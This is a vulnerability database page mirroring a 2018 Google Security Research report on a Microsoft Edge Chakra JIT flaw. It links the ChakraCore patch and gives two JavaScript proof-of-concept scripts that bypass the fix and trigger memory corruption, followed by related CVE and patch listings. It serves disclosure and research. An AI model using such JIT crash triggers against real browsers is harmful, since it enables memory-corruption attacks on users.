Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtGoogle Security Research1337DAY-ID-29790
HistoryFeb 15, 2018 - 12:00 a.m.

Microsoft Edge Chakra JIT - GlobOpt::OptTagChecks Must Consider IsLoopPrePass Properly (2)

2018-02-1500:00:00
Google Security Research
0day.today
20

0.96 High

EPSS

Percentile

99.3%

JSON

Exploit for windows platform in category dos / poc

It seems this is the patch for the bug.
https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a
 
The following two cases will bypass the fix.
 
1:
function opt() {
    let obj = new Number(2.3023e-320);
    for (let i = 0; i < 1; i++) {
        obj.x = 1;
        obj = +obj;
        obj.x = 1;
    }
}
 
function main() {
    for (let i = 0; i < 100; i++) {
        opt();
    }
}
 
main();
 
2:
function opt() {
    let obj = '2.3023e-320';
    for (let i = 0; i < 1; i++) {
        obj.x = 1;
        obj = +obj;
        obj.x = 1;
    }
}
 
function main() {
    for (let i = 0; i < 100; i++) {
        opt();
    }
}
 
main();

#  0day.today [2018-04-02]  #

Related

mscve 1
checkpoint_advisories 1
packetstorm 1
veracode 7
prion 13
osv 13
cve 13
kaspersky 1
mskb 5
nessus 5
openvas 5
talosblog 1
trendmicroblog 1
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2018-01-03 08:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-0770)
2018-02-18 00:00:00
packetstorm
packetstorm
Microsoft Edge Chakra JIT Incomplete Fix
2018-02-15 00:00:00
veracode
veracode
Remote Code Execution (RCE)
2018-07-05 01:12:57
Remote Code Execution (RCE)
2018-07-05 03:03:14
Remote Code Execution (RCE)
2018-07-04 08:38:30
prion
prion
Memory corruption
2018-01-04 14:29:00
Memory corruption
2018-01-04 14:29:00
Memory corruption
2018-01-04 14:29:00
osv
osv
CVE-2018-0781
2018-01-04 14:29:01
CVE-2018-0769
2018-01-04 14:29:00
CVE-2018-0768
2018-01-04 14:29:00
cve
cve
CVE-2018-0776
2018-01-04 14:29:00
CVE-2018-0768
2018-01-04 14:29:00
CVE-2018-0774
2018-01-04 14:29:00
kaspersky
kaspersky
KLA11166 Multiple vunlerabilities in Microsoft Browsers
2018-01-03 00:00:00
mskb
mskb
January 3, 2018—KB4056893 (OS Build 10240.17738)
2018-01-09 08:00:00
January 3, 2018—KB4056888 (OS Build 10586.1356)
2018-01-09 08:00:00
January 3, 2018—KB4056890 (OS Build 14393.2007)
2018-01-09 08:00:00
nessus
nessus
KB4056893: Windows 10 LTSB January 2018 Security Update (Meltdown)(Spectre)
2018-01-04 00:00:00
KB4056888: Windows 10 Version 1511 January 2018 Security Update (Meltdown)(Spectre)
2018-01-04 00:00:00
KB4056890: Windows 10 Version 1607 and Windows Server 2016 January 2018 Security Update (Meltdown)(Spectre)
2018-01-04 00:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4056893)
2018-01-04 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4056888)
2018-01-04 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4056890)
2018-01-04 00:00:00
talosblog
talosblog
Microsoft Patch Tuesday - January 2018
2018-01-09 13:36:00
trendmicroblog
trendmicroblog
TippingPoint Threat Intelligence and Zero-Day Coverage – Week of January 8, 2018
2018-01-12 15:09:44

0.96 High

EPSS

Percentile

99.3%

JSON
Related for 1337DAY-ID-29790
mscve1checkpoint_advisories1packetstorm1veracode7prion13osv13cve13kaspersky1mskb5nessus5openvas5talosblog1trendmicroblog1